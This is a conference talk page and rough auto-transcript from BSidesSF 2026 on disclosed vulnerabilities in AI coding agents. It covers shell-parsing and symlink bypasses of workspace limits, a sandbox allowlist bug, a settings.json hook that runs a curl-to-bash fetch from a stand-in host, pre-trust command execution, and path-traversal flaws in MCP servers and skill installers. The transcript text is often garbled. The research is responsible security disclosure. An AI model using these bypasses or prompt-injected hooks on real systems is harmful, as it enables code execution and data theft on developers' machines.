← All talks

BSidesSF 2026 - Not My Vibe: When AI Coding Agents Go Off the Rails (Aonan Guan, Zhengyu Liu)

BSidesSF45:5658 viewsPublished 2026-05Watch on YouTube ↗
Mentioned in this talk
About this talk
Not My Vibe: When AI Coding Agents Go Off the Rails Aonan Guan, Zhengyu Liu We reveal a new attack surface in CLI AI agents. By reversing Gemini CLI, Claude Code, and Codex we found systemic flaws — command injection, workspace escapes, and cross-process RCEs. We demonstrate real exploits (responsibly fixed) and share lessons for safer, sandboxed, verifiable agents. https://bsidessf2026.sched.com/event/0a21cf65939a3e2eb38e20dc53b9d782
Show transcript [en]

I will present to you our presenters. They're going to talk about not my vibe when AI coding agents go off the rails. Take it away an >> Thank you. Thank you everyone. >> So we are uh we are on Jungu and Gavin. Gavin for passport and visa cannot come here today but he also contribute a lot. Thanks to uh thanks to Gavin and uh if you use cloud code Gemini CLI or code or any AI agents before you know web coding so you tap a prompt and the agent write the codes and run the command. edit your files here and if you feel it's like a magic and today we're going to show you what happens when that magics go wrong

and how the security of these tools evolve in the real time over the past in the past years and a quick show of your hands how many of you have used an AI agents in the last months and how many of you has used yolo mode or auto approve mode or skip dangerous command okay I see fewer hands And if you're using that mode and this talk is specially for you and you will learn out yeah so a quick introduction I'm the security engineer at wise lives and jungu uh is a PhD student at John Hopkins University and Gavin is an independent researcher together we have been doing deep dive security research on AI coding agents

specifically the CLI based agents uh over the past year we have reported vulnerability in both Google and anthropic received multiple bounties and today we're sharing what we learned from them and our approach was different from typical security research. We did not only f the endpoint, we also learn from the code from the very early version to release by release and trees how their security architect involved. And this is the story we are telling today and this is one uh one screenshot I took from Steve's blog post and his blog post is talk about the future of coding agents. It captures the trend perfectly. So in 2024 uh we have autocomplete just like a figure one the green lines we

have autocomplete in line and then in 2025 people are starting to use the ID extension that asks a yes and no before doing things just like figure two and then come to the yolo mode and figure three and the agents just does everything without asking people starting to make a yolo and now the figure four and beyond the agent has take over the the IDE whole IDE and then take over the whole workflow and the key insights here is like as the agents get more autonomous the security service exploited so exploed and every new capability is a new attack matcher and let's take a look how CLI agents works here so uh let's ground ourselves

let's take a look here to simplify that it's pretty simple as five steps you launch it in your directory uh that's your current working directory and uh this becomes the agent's And it says a trusted boundary here and you tap your natural natural language prompt to it and everything uh just like a fix this bug and add a new login page and you will send your prompt to the remote LLM and then the LM respond with a ex actionable action and just like a run this command added a file with the specific file name and then the local LM agent harness will parse that response to an executable to call and that to call will ask for your permission and

the permission step just like a step file that's the entire secret model and the local agent is the g gatekeeper between the LM intention to the actual system and as we will see the gatekeeper has a lot of holes here let's take to take take a look at this one as an example this is this is the architecture diagram from Google's gemness CLI that has a as the deep key to deep wiki to generate it and it's pretty concrete and on the left blue that's a user loop you tap you approve it and in the middle purple that's the agent agent loop it talks to the LM and gets a two request run them through a

policy NG and on route the output the critical path is the right right line here just like from LM response through the policy to to call execution so many vulnerability we'll show here today is about bypassing something on that path so let's think about how can it go wrong just risk facing in the CLI agents so uh many people doesn't realize that when you clone a reple and you open it and with your AI agents you're not starting from a clean state. So just look at the project struct structure on the left there are many markdown files there are many configuration files there and like a cloud directory skill files in the middle you can see that's actually the

that's that's actually the real system prompt from Gemini CLA and many of these file will be embedded to the system prompt and this one of the very good example of how external files will influence your agent's behavior and there are even more So there are major uh there are actually three uh three categories here that attackctor can control and first is the files in the workspace and the second is the content that the agents retrieve dynamically just like the tool call read a file or calling from web web f and the third one is extended is extended surface just like the MCP servers or the agent skills that add new tool tools and capabilities and each of them is a new trust boundary

that the agent across without the user necessarily understanding the application and John you will cover the extended surface right after me. So how can it go wrong? How can it go wrong? So this isn't theoretical like these are many real world example that how can you go around just starting like starting from Gemini CLI to Amazon Q and then to the CI uh and especially the Amazon Q and the CI one uh both two are the big supply chain issue that influence that affects many other people and now let's start to see how it actually works. So we did a systematically empirical study. We went through the source code of gemini and cloud code version by version basically

and from very early version we checked the attack release and read the div and found the architecture and some of the vulnerability we are going to show uh found by us some from by our other researchers. Let's start from the foundation first. So uh it all start with CWD. So everything starts from CWD the current working directory. So when you launch your gem CLI or other agents, the the agents will capture the current working directory. Uh that becomes the very first security boundaries. And here's the actual code that I cap captured from Gemini CLI. That's a I captured from the very early state uh early release from 20 uh July 2025. On the left you can see

the search result here uh with the is within roots. So this function is crossed the code code basease. It appears in the glob appears in read files appears in edit file and write files. So basically whenever you want to call these tools to change your code, you'll firstly pass these function to see if you want to edit a file that within the current working directory. Um it sounds like a perfect uh sound like a perfect uh perfect solution like using the CWD as a trust boundary to make intuitive sense like you launch your agent here and it should only touch the files in your project, right? But what could possibly go wrong? What could possibly go wrong? So turn out many

turns many. So uh let's take a look. So the pass checking sounds simple but just checking if the pass start with your root directory. Turn out it is harder than we think. So I'll take a I'll show you some CV first. And the first CV is happening in cloud code very early version. So it's like a prefix tracking. So it checks the current working directory by prefix. So if they're sharing the same prefix you may go wrong. And the second one is about symbol link by pass. So simple link is a soft link that you can link your current link your file from from your current working directory to the file outside the working directory

and basically it tricks the CLI agents that the file is inside the current working directory and this happens in 2025 but actually in 2026 there were another simple link happens single link problem happens again people think it may be easy or simple problem but actually it happens multiple times in the production environments and in the production software ware and uh we also we also not we also found this problem in Gemini CLI this one these three we presented here was from clock we also found the one in Gemini CLA and sent to Google although Google doesn't assign CV to it but it's still a problem yeah so yeah let's talk about the big one the

shell tool so let's take a look on this screenshot so whenever we want to uh edit a file like outside the current working directory it will be blocked. So the refile see seeing me that I uh want to read a file outside working directory is it rejected and then what on the right I'm using a cat to do the similar thing basically I want to read the credential outside the current working directory it didn't ask for my comm uh ask for my permission so what I'm per what I'm approving now is approving the cat so the cat doesn't check the current working directory the read file does so this is a fundamental problem the file

tools enforce CW boundaries but the shell tool doesn't so and it is hard really hard because the shell can do anything and it has many uh var uh variation so why is it so hard just like uh you can see there are many shell command here that one command root you can has infinite variation and now you multiply by even shell by every shell built in that's a real problem so basically we want to say be be aware of the that. Yeah. So why can now why cannot we just parse a shell command easily and block the dangerous command. It turns out it's not an easy problem because shell bash syntax is generally complex. It's a full

programming language and the command list here uh the command list here are some malicious command and is very hard for everybody to to parse it to split it and to understand it and for semantically we cannot do it easily and if we want to use a native split just like the the showing below or we want to use rag to understand it we could go wrong in the end so we need a real parser let's see how gemini CRI builded parser so Let's trace the evolution. This is one that uh from Gemini very early version from 0.1.8 the very first version. Uh all the shell parsing logic was in line in the tool class like you were only like 115 lines

of code and it is pretty simple and to bypass just a simple semicolon to train your command and then you will bypass the approval command and attacker can append their malicious command to it and bypass occur in the detecting system. And later on in 0.18 they added detect command substitution and the dedicated function that tries to catch the dollar sign catch a backlick substitution catch the process substitution but look at the red uh red box here it is still missing like currently it can detect the uh bracket uh left bracket but actually it's missing the rep red bracket. So we report this process substitution to pre uh prevention because the this prevention is impartial and Google

accept it and fix it in the later version. Now so since there we have been seeing multi many problems here and uh that could not be easily solved by rag by pars by simple rule matching and then Google start to use the uh real real parser trictor in case you don't know trictor is a parser that can parse the command language that have been used in vs code for for syntax highlights and this is the same parser that use in vs code and you understand the full bash grammar code uh coding rules and process substitution uh everything related to the uh related to the process arguments and strings and this is a massive uh upgrade from rag splitting but it took

three months for Google to achieve that from July to October and to make it actually work properly they spend another six months so even when they have the tree seater the real parer uh there was still a big problem let's take a good example here let's see let's take the cam as an example. So this is a time command. So this tag command is uh time command is used to measure the performance of a command. So you will trace the command execution invocation and measure the performance of the time that it was invoked. And take a look so when so when the user trusted time they saw they were trusting time. But what actually gemini

sees it's like you will trust all the following command. So you will trust all following command behind time. So what Gemini CL I see is here is like when I uh when an attacker append another malicious command after time just like a Python invocation then Gemini will trust it and then that's a problem. So this problem still happens in uh Gemini CLI 0.2.8 you will just fix last month's uh February 2026. So in Gemini CLI 0.2 two uh 29 they fix it. They just fix it the last month. So yeah, it's time. So uh here's a comparison about the different uh different milestone of Gina CLI and sim similar Python also happens to other CLI agents. So from time for

for for time limitation we cannot explain one by one of all of the bypass but you can take a look on this uh table as an example and also just notice that Google even spend about more than 9 months to makes it work properly and 9 months of evol uh evolution for a simple string from simple string to comp compiler level parsing and this is a trend of the security in this space and it is still not complete and not not only just Gemini. So this is the one we captured from clockos uh record. This is a full table of CVE and our shell command bypassing look like a wacka mole. So nine different bypass and

n CVE and I believe there will be more just like a weapon game and so let's take a look at this timeline and the python is pretty clear like the defense dependence but the attack escalates. So every new defense creates a new edge edge cases that can be exploited and attack the attacker can always one stop high because they only need to build one bypass technique while the defender need to cover all of the edge cases and it's pretty pretty complicated problem that's why we need another approach that's why we need sandbox approach and let's uh invite Jungu for talking about the further techniques >> okay uh thank you Anna Uh so I'll take over. So it looks like that the shell

parsing is a losing game and because simply because you can never fully understand what a shell command will do but just parsing it. So why not just send box everything and like we can run the agent in a restricted environment where it physically cannot access the files outside the project or like it reach the remote targets is not allowed to. And actually people have been thinking about this problem long time ago, right? And today we already have a lots of reliable sandbox. So why not use them? Uh so uh what you're looking at here is like a bubble wrap on the Linux and they use like kernel namespace to create isolated resource names like the

file system P network name space and host name namespace and paired it with the setcom. Basically, you can filter out all the system cards you want to block. And the idea could be very simple, right? Instead of trying to understand every possible like shell commands that Elm would want to give you, you just make sure that when when it get executed, it will file. It will never success. And here is basically a landscape of the current sandbox uh technologies cross the platform. And it's not a complete list but give you a like overview like for example for Mac OS we have seat belt it's like a kernel level policy files that restricts the f size network

operations and system cause bypass and operation and this what's Apple has been using for app set boxing and on links we have bubble wrap plus sitcom for light uh lightweight uh namespace isolation with sys call filtering and if you want something more fancier and more complex. You can go uh J visor uh like it's a a totally like a user space kernel that reimplements the sys call and so that the application will never talk to the host kernel directly and on windows we have terminal things like uh restrict token plus job objects for process level restrictions. So we can actually fully take a bunch of those sandbox right and now like here what's it gets really interesting like

all the three major CLI agents like the gymnastic clock code and codeex support set boxing but it looks like they uh approach it in uh different ways uh for example uh take uh code as an example like it's a sandbox first approach like uh and actually it's the only one that will always enable the sandbox by default. And so basically it means that every shell command and every shell I edit a file edit tools that agent makes will get spawned as a child process wrapped in the sit belt on OS or a bubble wrap plus setcom on Linux and the network is blocked by default and it looks like the most restrictive approach and for gymnasti it's disabled by

default unfortunately so but it also provides you a way to basically op in a sandbox flag and in that case it will uh enable it and exception is that uh uh uh like the gymnast is can't lead to uh have a config that if you use a yolo mode and it will automatically enable the sandbox. So uh but when enable it like uh the also the GSI like did a a slightly different way like it it does not basically do something like what uh code access is trying to do it instead it basically setbox the entire agent process. So on Mac OS that they use also use a sit belt and on Linux it just they use a docker

container and that means that everything for example the shell commands the file reds and even like other in process reads will be constrained by the sandbox and for cloud code is also disabled by default and when it's enabled it uh it does something like the code access it will try to wrap every individ individual batch child process in the set box and execute it and as you can see like well every agent supports sandbox but not all of them will enable it by default. So if you think they are secure because uh they claim they have a sandbox you need to double check whether you have enabled it actually and uh sandbox is also not a silver

bullet and what if the sandbox is itself has a bug and this is actually a vulnerability we find uh on 205 and they turn out that someone uh also identified it. So there's a colette but that's fine but we have to share it here. So basically uh the cloud codes provides a sandbox runtime library and that library basically have a config that allows you to specify which domain that you want the agent to connect to during the uh during the like a runtime. So basically it's like a wet list of the domains and so if you do not pass that config so basically you means I do not want to set a wet list and then it will accept all

the like uh outgoing connections and that's should uh works as it expected but but if you uh put something within it like a I put a example come and as a list and pass it to it it means I would only allow the agent to connect to example config example.com during the runtime and uh the clock would do so and this also works but what if I output I pass in like a empty array to the to the to to to the like clock code it will interpret it differently. So basically here as a wet list I means that I do not allow any outgoing uh domains but what it actually does is that it blocked uh

it allow all the outgoing connections. So there will be a like misunderstanding here and if we look at the code it's a very simple programming bug I would say. So basically it try to check whether try to check the lens of the past in allowed domains and then if it's empty then uh it would just disable the network policy. So it means that if you didn't if you set allow the domains to empty basically allow all the domains and let's take a look at another more creative attack against the cloud host sandbox. So uh as so far as what we understand is that when the cloud is running everything get constraint. But what if the malicious code uh probably

like uh get injected by the attackers through some kinds of indirect or direct prom injection uh get executed and it does some like a normal things during the sandbox time. But after the sent uh session is over and uh it will take its effect. So for example like in this case is basically during the sandbox session the malicious code we see in the sandbox would ask the code OS cloud to basically write to the settings.json and it sounds like a normal request because uh clouds setting.json suggestion is something available under its own directory and workspace and just and it doesn't exist previously. So uh the sandbox will happy to to allow it to complete uh but what the agent actually

does is basically it creates uh hooks like it's like a session start curl evo.com bash. So basically we are trying to override a config file of the clock code that would take in fact uh when the clock gets executed next time. Um so the the problem uh is like this. So the pro sandbox would protect the current session but uh it doesn't protect the file that can control the next session and it could be a classic time of check and time off not used as a time off attack issue across this next session. And so uh besides the sandbox uh let's uh look at something uh similar. So from our last vulnerability we have seen uh

so we can see that the sandbox protects the runtime like uh everything the agents generate and execute during the session. But what if there are codes that can be executed before the setbox even get started. So this is what we call the trust before trust problem. So uh whenever you open a workspace the agent would prompt you to say okay so uh do you want to trust this workspace u through like a trust dialogue but what if the code get executed even before the trust decision even happens and that's actually how the problem occurs for example in uh in in the cve like uh 598 to8 so basically the cloud code would run like a yarn version at a startup to

check your environment. But the yarn command itself can uh have a hooks right and it will try to load the plugins from uh the uh yarn ray. file locally. So if you put any like malicious plugins under this ripple and when dur when the clock try to check your environment during the bootstrapping process it will get executed and similarly like the clock will also read your g config and run like git config user email but what if the attacker can control the user email and pass in uh basic command injection payload like anything uh like a dollar and the wrap a malicious uh command within it and passed it to this company. Basically, there is another command injection

problem happens. Um and there are others right like previous we have seen that you can control the setting.json and basically that's controls how the cloud code would works entirely. So there are some many problem that uh happens during the bootstrapping uh process and and that will can that will trigger the code execution and in that case the agent the the sandbox won't help. So to summarize like well the cell agents have become like our everyday coding partners but here's the reality that cloud code alone had 22 cases in 10 months and 19 of them are rated as high. So um we're not going to blame Clock Hill, but instead they're doing a very great job like they they are trying to

make the disclosure uh process as transparent as possible and try to fix most of the vulnerabilities. Uh but you can see the trend here that as a security layer get hardens uh the attackers move to the next one. So don't be surprised that when your like coding agent gets hacked someday in the near future. Okay. So uh let's move jump to another topic which is about the software around the cell agents because nowadays people use many things around develop and use many things around the cell agents to basically extense its behavior. That's what we call cell extensions. And nowadays there are mainly two types of cell eye agent extensions. Uh the first one is the MCP like for I think most of

you guys should be aware of this and if not basically MCP is just a protocol that connects your agent to an external tools and data sources. And usually MCP server is a separate like a longunning uh service running in a local process or remotely. uh for example a playright server for for browser automation or like is a GitHub MCP that allows you your agent to basically retrieve the data from the MCP and usually your agent would run MCMP clients that could communicate with those servers and uh works like a external call. Uh another category is just uh proposed recently is called like not not recently but proposed like more recent uh it's called SKUs. Basically SKS are just a packages of

instructions uh resources and optional codes that teach your agent about some task specific workflows. And uh during the runtime the agent would uh see those skills name and descriptions and load the full instructions uh only when it decide to use one. So both of them basically extend the agent's capability and you can single MCP as external to call and skills as a bunch of the scripts with descriptions. Uh but uh here's something interesting that if we try to compare the security model of the two things they are different. Uh take this as an example. So basically if I want to excise good at times through plate rides in the sandbox mode uh uh and by using the two-way to

do it on the left there's a plate red like running as an MCP server and it navigates to the go.com and interacts with the page and there's no problem everything works perfectly uh on on the right side like if we try to uh uh serve the player as agent SKS um it will get some error like it trust through red into the plate rest catch directory but it will fail and blocked by the sandbox. And one missing that oh this is is just a simple like a red foul problem that uh the sample rejects you to read something somewhere like outside the workspace but actually it's not uh the fundamental different is that um the MCP server are

already running process that agents talks to them over a protocol but not by spawning them. So like the sandbox within the agent has nothing to do with the the MTPC servers like the sandbox has no uh jurisdiction to those pre-existing process but for skills eventually although like those are taxs or or like a script eventually there will be uh they will be like uh imp running using the like provided the bash tools right usually so at that time like sandbox would apply But for MCP servers basically it like we cannot control it like the sandbox cannot control it. So it won't have any uh restrictions. So it sounds like uh MCP servers like uh live

outside the box right and for the RMCP servers as you can imagine even the official ones have a lots of vulnerabilities and some of them are found by us and those are uh remarked by YanLo uh uh just just name a few of them for example the file system MCP server uh so um there are two CE belongs to this one so basically ally those are all using classic techniques that's used to bypass the workspace restrictions it's just in another space uh another place uh the one is using the same link handling another one is using colluding pass prefix so it sounds similar because this is exact the same bug we have seen in the cell agent itself but it's

repeated in the MCP server because MCP server are implement differently u and also for the g MCP server there are also multiple C cve for example the uh the one is because like you can run the gene in need to cause on arbitrary files. So basically you can create it a get ripple or try to track it track a file as a g ripple on arbitrary like uh f file system uh file path. Another way is like uh argument injection in the git div that you can pass uh uh specific arguments to the g div to call and it will give use the arbitrary file override and another like a pass traversal in the g ad that you can

basically use g ads on an outside file system uh outside file that do not belongs to the current to work directory and you st uh you stage the files And then uh because it means uh validation and you basically can stage the files and try to retrieve the files content uh it will gives you file rate. So there are like many bugs within those MCP servers. Another is like within the MCP memory servers. So basically it uh it's just uh like a JSON write tool call that uh like when the agent try to invoke it will try to write something as a memory to a like a local JSON file. Uh but it has a loose JSON schema check during the

right. So basically you can uh abuse that feature by passing a attacker controlled path and some arbitrary JSON file right. will allows you to compromise arbitrary JSON file rights on the file system and and and I believe if you search up the whole MCP servers there are more than that and because that's uh that's uh uh and many of them are just the classic like injection problem because to the agents those are just the two external to cause and agents may pass some u malicious as the two cause arguments and if your MCP server doesn't handle it correctly, injection happens. Uh so besides the MCP servers, uh what's about the distribution and the installation process? So we all know

like um like we want to basically uh explore, discover and install like some arbitrary like MCP servers uh in the wild pro provided by others. Um and uh cloud code desktop are basically pro uh one approach for that which is called MCP bundles and those are official uh like distribution formats that you can use by just dragging and dropping a zip file to the uh cloud desktop and to install an SAP uh extension and but the problem here is that the MCP use the F flat for compression and Flight is uh has uh basically this split uh dipl slip vulnerability that simply returns the path as stored in the zip and do not validate or sanitize them. So if a

malicious MCP bundles let's say a zip file that contains a file whose uh path is like do slash uh slash to traverse to your another uh pass and the dip flag would happily to extract it there. So uh that's that's some uh classic zip slap vulnerability happens like shown again in the MCP bundles and besides the MCP server and the this dip slap variant also appears in the G uh in the in the skills installation process and we call it uh skills slip and so basically like Gemini provides a very simple command like GNI skills install and you just pass a file up a path to your the skills you want to install and will uh basically store it

on your like local uh system. But the problem here is that basically it uh blindly trust the SKU's name uh and then concatenates with the the target DIR and use it as a destination props and copies all the sources file to that destination pass. So basically if you can provide a skill name that's uh uh using some like data slash those past traversal patterns basically you can uh get your skills uh like basically copied or like uh write to the arbitrary file path on on the on the victims systems uh and for example like this right to to write for example if I want to overwrite to the west code uh settings.json. So I can write a malicious skills like this.

I put the skills name as uh past traversal patterns and I internally I have a settings.json and setting the JSON basically a classic V code workspace hijacking that you can leverage the uh VS codes protocol like uh terminal that integrates profiles. Ox. So basically that code will be get executed when you try to start terminal in the west code and then hopefully will just copy to there and when the victim launch another terminal and the code will execute it and here we have a short video to show uh how this works. Uh yeah. So basically if we want to install a SKUs using GMA CLI by running this symbol command uh we can just do it

and and GNI CLI basically will shows the correct path that we want to install too and then the GNI do alert the user does alert the user that there's the the untrusted skills may affect the agent's runtime by running like a malicious command but The problem is our attacks could happen even earlier like before the agent even get started because once the uh because once the installation completes we can we already inject the command to the west code folders like setting adjacent um so in in that case we will hijack the user's neck terminal uh when la to to launch a process.

Yeah, as you can see like the code get executed. Okay, so we have seen a lot of attacks currently. So what can we do now? Uh to be honest, I don't think there's much things that we can do as a user. Uh because we need to coding every day. So we cannot just forbid those one. But uh there are some like there are some recommendations that may uh be able to give. The first one is do not blind out blindly trust the agent and use the yolo mode and treat it as a testing feature but not uh like a production one. Then always keep like a human approval step whenever the agent touchs your critical

repos or things. And the second is that try to audit your context files because before your agent get run there's lots of files in your workspace can basically control the agent's behavior. For example the agent imd and many of them are treated as the system prompt. So if the attacker control it, it's it basically it can instruct your agent to to do malicious things and uh also like verify those commands what's being run at the runtime. Um if it's too complex and if anything is is is too complex to parse at a glance, you should not run them. Uh and then finally like use the setbox by default. um like those sandbox at least they are still

useful although like you may get a lot of errors but that's how the sandbox try to protect you. So basically um and basically you can improve it uh by adjusting the the policy that's used by the setbox like day by day. Um so you can greatly adjust it so that it will works perfectly with your setup. uh and those are the things that we can do today. But um stepping back I think like stopping prompt injection and command injection leading led by those prompt injection feels really like a endless game like because every new attack surface every new agent uh and the code with around the agent would create basically a new attack surface. So it's

very hard to uh to to to step ahead of the uh the attacker. So uh I want to say here is that we still like of uh uh robust and trusting agent systems and uh hopefully we can get our agents more auditable and transparent and also enable the secure by default uh mode among all those agents. Um and hopefully those will delivers both functionality and security in the near future and that's the something we should like keep pushing forward. Uh thank you. Uh that'll be all of our talks. Thank you.

All right. Thanks. We do have uh and we have some uh room for questions. I've got one on Slido again. sliders how we're going to do this. Uh we're going to try to do this as fast as possible. So earlier you were showing some system prompts. Are those verified or are they just what the LLM thinks is the system prompt is? >> Yeah. So for podism different software have treated differently for Gemini and anti-gravity if there were some uh markdown that treated in markdown sitted in the work uh workspaces and you will be directly uh embedded into the system prom. So from software level they will embed their whole system prom but automatically uh you will read the file

first and then embed it to the system prom and then send to the remote LM model. All right. Now, uh here's one possible solution. Could an agent review the commands that are issued by the main LLM or is that just uh as susceptible? >> Yeah. So, uh is it qu is a question about letting the agent to review the command you want to >> right having one LLM review the other before executing the commands? >> Actually, uh I think that is one thing happen in cloud code. Uh we've during our uh during our research we found that cloud code sometimes uh if they fail the uh statistical analysis and you will use to like uh you could not match the

hardcoded python uh you will use haiku model from our research you will use hiku model that is a remote small model to detect the command that you want to execute and to find if this is safe or not and to find the actual root command like uh previously they doesn't have tree sitter if tree sitter cannot find the root amount. You use hikcom model to uh hikcom model to find the root amount. >> All right, I've uh accidentally closed my slido session. I'm going to take more questions in here. Again, we're at bidesf.orga or if you go to slide.do uh and type in the log code besides SF2026 theater14, we can get more questions. So, uh, how about here within the room?

And I apologize if you're in an overflow theater and I can't see your, uh, see your questions. >> Okay. >> All right. Oh, yeah. Go ahead. I'm going to repeat it. So, just ask it out loud and I'll say

>> what are you doing in your Yeah. So again, I'll repeat this. >> So you advise against going in yolo mode, but you know that's what makes the tokens go burr. So what do you do in your personal projects to really get things going? >> Yeah, actually for my personal project, I always I never use yolo mode at all. I really don't use it at all like for all of I treat it carefully especially when I found so many there. I could not treat it like easily that that that every command will be safe. if I cannot treat it like that and and at least at least for one of the cases uh what I'm seeing

is like for people are using agent in many automous workflow uh if you are using build it for your defa spaces it's okay uh I I it's controllable like the the impact is controllable but if you're using in autonomous workflow I I I suggest never use mode at all because you know autonomous we we do see some autonomous workflow that using yolo mode and it's very easy to to do prompt injection in it and trigger another problem and we we do see it before. So at least for your personal project and for your running in your local file system looking uh working directly and I think you don't know it's successful uh although I don't use it but but it's

okay. >> All right. Thank you out Jung.

[ feedback ]